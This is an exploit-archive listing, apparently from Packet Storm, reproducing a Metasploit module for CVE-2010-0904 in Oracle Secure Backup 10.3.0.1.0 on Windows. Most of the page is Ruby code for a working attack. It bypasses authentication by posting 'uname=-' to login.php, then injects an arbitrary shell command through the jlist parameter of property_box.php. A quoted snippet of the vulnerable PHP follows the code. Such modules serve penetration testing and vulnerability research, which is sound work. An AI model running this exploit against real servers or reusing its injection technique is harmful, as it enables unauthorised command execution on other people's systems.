Oracle Secure Backup Authentication Bypass / Command Injection

Oracle Secure Backup Authentication Bypass / Command Injection: Posted Aug 31, 2024; Authored by Jay Turla | Site metasploit.com; This Metasploit module exploits an authentication bypass vulnerability in login.php in order to execute arbitrary code via a command injection vulnerability in property_box.php. This Metasploit module was tested against Oracle Secure Backup version 10.3.0.1.0 (Win32).; tags | exploit, arbitrary, php, bypass; systems | windows; advisories | CVE-2010-0904; SHA-256 | 6863a81671e2c9181fc762b376462302051ea799490c07fe8f165bc20e6d3514; Download | Favorite | View

Oracle Secure Backup Authentication Bypass / Command Injection

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability',
      'Description'    => %q{
          This module exploits an authentication bypass vulnerability
        in login.php in order to execute arbitrary code via a command injection
        vulnerability in property_box.php. This module was tested
        against Oracle Secure Backup version 10.3.0.1.0 (Win32).
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2010-0904' ],
          [ 'OSVDB', '66338'],
          [ 'ZDI', '10-118' ],
        ],
      'DisclosureDate' => '2010-07-13'))

    register_options(
      [
        Opt::RPORT(443),
        OptString.new('CMD', [ false, "The command to execute.", "cmd.exe /c echo metasploit > %SYSTEMDRIVE%\\metasploit.txt" ]),
        OptBool.new('SSL',   [true, 'Use SSL', true]),
      ])
  end

  def run
    cmd = datastore['CMD']

    res = send_request_cgi(
      {
        'uri'  =>  '/login.php',
        'data'  =>  'attempt=1&uname=-',
        'method' => 'POST',
      }, 5)

      if res && res.get_cookies.match(/PHPSESSID=(.*);(.*)/i)

          print_status("Sending command: #{datastore['CMD']}...")

          send_request_cgi(
            {
              'uri'  => '/property_box.php',
              'data'  => 'type=Job&jlist=' + Rex::Text.uri_encode('&' + cmd),
              'cookie' => res.get_cookies,
              'method' => 'POST',
            }, 5)

        print_status("Done.")
      else
        print_error("Invalid PHPSESSION token..")
        return
      end
  end
end
=begin
  else if (strcmp($type, "Job") == 0)
    {
    if (!is_array($objectname))
      $objectname = array();
    reset($objectname);
    while (list(,$oname) = each($objectname))
      {
      $oname = escapeshellarg($oname);
      $jlist = "$jlist $oname";
      }
    if (strlen($jlist) > 0)
      $msg = exec_qr("$rbtool lsjob -lrRLC $jlist");
=end

Top Authors In Last 30 Days

Red Hat 256 files
Jay Turla 150 files
indoushka 149 files
Ubuntu 67 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Debian 24 files
Karn Ganeshen 23 files

File Archives

Systems

AIX (429)
Apple (2,104)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,117)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (880)
iOS (387)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,066)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,731)
Slackware (941)
Solaris (1,614)
SUSE (1,444)
Ubuntu (9,807)
UNIX (9,449)
UnixWare (187)
Windows (6,762)
Other

Oracle Secure Backup Authentication Bypass / Command Injection

Oracle Secure Backup Authentication Bypass / Command Injection

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Oracle Secure Backup Authentication Bypass / Command Injection

Share This

Oracle Secure Backup Authentication Bypass / Command Injection

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems